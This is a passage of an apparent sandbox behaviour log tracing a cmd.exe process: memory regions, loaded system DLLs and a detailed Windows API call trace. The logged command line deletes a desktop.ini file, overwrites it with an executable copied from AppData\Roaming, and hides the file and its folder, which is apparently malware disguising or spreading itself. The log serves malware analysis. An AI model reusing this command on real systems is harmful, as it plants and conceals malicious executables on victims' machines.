[0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13781 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13782 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13783 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13784 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 13785 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 13786 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13787 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13788 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13789 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 13790 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 14045 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14046 start_va = 0x20000 end_va = 
0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 14047 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14048 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 14049 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 14050 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 14051 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14052 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 14053 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14054 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14055 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") 
Region: id = 14056 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 14057 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 14058 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 14127 start_va = 0x2b0000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 14128 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 14129 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 14130 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 14131 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 14132 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 14133 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 14134 start_va = 0x4c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 14135 start_va = 
0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 14136 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Region: id = 14218 start_va = 0x1340000 end_va = 0x160efff entry_point = 0x1340000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 200 os_tid = 0xcac [0136.301] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afb2c | out: lpSystemTimeAsFileTime=0x2afb2c*(dwLowDateTime=0x8b2c83a0, dwHighDateTime=0x1d440a9)) [0136.301] GetCurrentProcessId () returned 0xcb0 [0136.301] GetCurrentThreadId () returned 0xcac [0136.301] GetTickCount () returned 0x2b154 [0136.301] QueryPerformanceCounter (in: lpPerformanceCount=0x2afb24 | out: lpPerformanceCount=0x2afb24*=19309034599) returned 1 [0136.302] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0136.302] __set_app_type (_Type=0x1) [0136.302] __p__fmode () returned 0x76b331f4 [0136.302] __p__commode () returned 0x76b331fc [0136.302] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0136.302] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0136.302] GetCurrentThreadId () returned 0xcac [0136.302] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcac) returned 0x38 [0136.302] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0136.303] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0136.303] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.323] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, 
HeapInformationLength=0x0) returned 1 [0136.323] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2afabc | out: phkResult=0x2afabc*=0x0) returned 0x2 [0136.324] VirtualQuery (in: lpAddress=0x2afaf3, lpBuffer=0x2afa8c, dwLength=0x1c | out: lpBuffer=0x2afa8c*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.324] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2afa8c, dwLength=0x1c | out: lpBuffer=0x2afa8c*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0136.324] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2afa8c, dwLength=0x1c | out: lpBuffer=0x2afa8c*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0136.324] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2afa8c, dwLength=0x1c | out: lpBuffer=0x2afa8c*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.324] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2afa8c, dwLength=0x1c | out: lpBuffer=0x2afa8c*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0136.324] GetConsoleOutputCP () returned 0x1b5 [0136.326] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.326] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0136.326] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.326] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0136.328] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.328] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: 
lpMode=0x4a9e41ac) returned 1 [0136.329] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.329] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.331] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.331] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0136.332] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.332] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0136.353] GetEnvironmentStringsW () returned 0x3d0538* [0136.353] FreeEnvironmentStringsW (penv=0x3d0538) returned 1 [0136.354] GetEnvironmentStringsW () returned 0x3d0538* [0136.354] FreeEnvironmentStringsW (penv=0x3d0538) returned 1 [0136.354] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aea2c | out: phkResult=0x2aea2c*=0x40) returned 0x0 [0136.354] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aea34, lpData=0x2aea38, lpcbData=0x2aea30*=0x1000 | out: lpType=0x2aea34*=0x0, lpData=0x2aea38*=0xe8, lpcbData=0x2aea30*=0x1000) returned 0x2 [0136.354] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aea34, lpData=0x2aea38, lpcbData=0x2aea30*=0x1000 | out: lpType=0x2aea34*=0x4, lpData=0x2aea38*=0x1, lpcbData=0x2aea30*=0x4) returned 0x0 [0136.354] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aea34, lpData=0x2aea38, lpcbData=0x2aea30*=0x1000 | out: lpType=0x2aea34*=0x0, lpData=0x2aea38*=0x1, lpcbData=0x2aea30*=0x1000) returned 0x2 [0136.354] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aea34, lpData=0x2aea38, lpcbData=0x2aea30*=0x1000 | out: lpType=0x2aea34*=0x4, lpData=0x2aea38*=0x0, lpcbData=0x2aea30*=0x4) returned 0x0 [0136.354] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aea34, lpData=0x2aea38, lpcbData=0x2aea30*=0x1000 | out: 
lpType=0x2aea34*=0x4, lpData=0x2aea38*=0x40, lpcbData=0x2aea30*=0x4) returned 0x0 [0136.354] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aea34, lpData=0x2aea38, lpcbData=0x2aea30*=0x1000 | out: lpType=0x2aea34*=0x4, lpData=0x2aea38*=0x40, lpcbData=0x2aea30*=0x4) returned 0x0 [0136.354] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aea34, lpData=0x2aea38, lpcbData=0x2aea30*=0x1000 | out: lpType=0x2aea34*=0x0, lpData=0x2aea38*=0x40, lpcbData=0x2aea30*=0x1000) returned 0x2 [0136.354] RegCloseKey (hKey=0x40) returned 0x0 [0136.354] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2aea2c | out: phkResult=0x2aea2c*=0x40) returned 0x0 [0136.354] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2aea34, lpData=0x2aea38, lpcbData=0x2aea30*=0x1000 | out: lpType=0x2aea34*=0x0, lpData=0x2aea38*=0x40, lpcbData=0x2aea30*=0x1000) returned 0x2 [0136.354] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2aea34, lpData=0x2aea38, lpcbData=0x2aea30*=0x1000 | out: lpType=0x2aea34*=0x4, lpData=0x2aea38*=0x1, lpcbData=0x2aea30*=0x4) returned 0x0 [0136.354] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2aea34, lpData=0x2aea38, lpcbData=0x2aea30*=0x1000 | out: lpType=0x2aea34*=0x0, lpData=0x2aea38*=0x1, lpcbData=0x2aea30*=0x1000) returned 0x2 [0136.354] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2aea34, lpData=0x2aea38, lpcbData=0x2aea30*=0x1000 | out: lpType=0x2aea34*=0x4, lpData=0x2aea38*=0x0, lpcbData=0x2aea30*=0x4) returned 0x0 [0136.354] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2aea34, lpData=0x2aea38, lpcbData=0x2aea30*=0x1000 | out: lpType=0x2aea34*=0x4, lpData=0x2aea38*=0x9, lpcbData=0x2aea30*=0x4) 
returned 0x0 [0136.354] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2aea34, lpData=0x2aea38, lpcbData=0x2aea30*=0x1000 | out: lpType=0x2aea34*=0x4, lpData=0x2aea38*=0x9, lpcbData=0x2aea30*=0x4) returned 0x0 [0136.354] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2aea34, lpData=0x2aea38, lpcbData=0x2aea30*=0x1000 | out: lpType=0x2aea34*=0x0, lpData=0x2aea38*=0x9, lpcbData=0x2aea30*=0x1000) returned 0x2 [0136.354] RegCloseKey (hKey=0x40) returned 0x0 [0136.355] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636a [0136.355] srand (_Seed=0x5b88636a) [0136.355] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\"" [0136.355] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\"" [0136.355] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.355] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3d1c98, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: 
"c:\\windows\\system32\\cmd.exe")) returned 0x1b [0136.355] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0136.355] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0136.355] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.355] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0136.355] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0136.355] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0136.355] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0136.355] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0136.355] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0136.355] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0136.356] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0136.356] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0136.356] GetEnvironmentStringsW () returned 0x3d2688* [0136.356] FreeEnvironmentStringsW (penv=0x3d2688) returned 1 [0136.356] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.356] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.356] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0136.356] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0136.356] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0136.356] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0136.356] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 
[0136.356] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0136.356] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0136.356] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0136.356] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af7f8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.356] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af7f8, lpFilePart=0x2af7f4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af7f4*="Desktop") returned 0x18 [0136.356] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0136.356] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af574 | out: lpFindFileData=0x2af574) returned 0x3d0d18 [0136.357] FindClose (in: hFindFile=0x3d0d18 | out: hFindFile=0x3d0d18) returned 1 [0136.357] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af574 | out: lpFindFileData=0x2af574) returned 0x3d0d18 [0136.357] FindClose (in: hFindFile=0x3d0d18 | out: hFindFile=0x3d0d18) returned 1 [0136.357] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af574 | out: lpFindFileData=0x2af574) returned 0x3d0d18 [0136.357] FindClose (in: hFindFile=0x3d0d18 | out: hFindFile=0x3d0d18) returned 1 [0136.357] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0136.357] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0136.357] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0136.357] GetEnvironmentStringsW () returned 0x3d0538* [0136.357] FreeEnvironmentStringsW (penv=0x3d0538) returned 1 [0136.357] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 
[0136.358] GetConsoleOutputCP () returned 0x1b5 [0136.369] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.369] GetUserDefaultLCID () returned 0x409 [0136.378] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0136.378] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2af938, cchData=128 | out: lpLCData="0") returned 2 [0136.378] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2af938, cchData=128 | out: lpLCData="0") returned 2 [0136.378] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2af938, cchData=128 | out: lpLCData="1") returned 2 [0136.378] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0136.378] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0136.378] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0136.378] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0136.378] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0136.378] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0136.379] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0136.379] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0136.379] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0136.379] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0136.379] setlocale (category=0, locale=".OCP") returned="English_United States.437" 
[0136.380] GetConsoleTitleW (in: lpConsoleTitle=0x3c0b30, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.399] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0136.400] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0136.400] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0136.400] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0136.401] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0136.401] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0136.401] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0136.401] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0136.401] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0136.401] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0136.401] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0136.403] _wcsicmp (_String1="del", _String2=")") returned 59 [0136.403] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0136.403] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0136.403] _wcsicmp (_String1="IF", _String2="del") returned 5 [0136.403] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0136.403] _wcsicmp (_String1="REM", _String2="del") returned 14 [0136.403] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0136.405] _wcsicmp (_String1="type", _String2=")") returned 75 [0136.405] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0136.405] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0136.405] _wcsicmp (_String1="IF", _String2="type") returned -11 [0136.405] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0136.405] _wcsicmp (_String1="REM", _String2="type") returned -2 [0136.405] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0136.639] SetErrorMode (uMode=0x0) returned 0x0 [0136.639] SetErrorMode (uMode=0x1) 
returned 0x0 [0136.639] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3d05f0, lpFilePart=0x2af0ec | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af0ec*="Desktop") returned 0x18 [0136.639] SetErrorMode (uMode=0x0) returned 0x1 [0136.639] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0136.639] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0136.643] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0136.644] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aee68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee68) returned 0xffffffff [0136.644] GetLastError () returned 0x2 [0136.644] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2aee68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee68) returned 0xffffffff [0136.644] GetLastError () returned 0x2 [0136.644] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aee68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee68) returned 0x3d2600 [0136.644] FindClose (in: hFindFile=0x3d2600 | out: hFindFile=0x3d2600) returned 1 [0136.644] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2aee68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee68) returned 0xffffffff [0136.644] GetLastError () returned 0x2 [0136.644] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, 
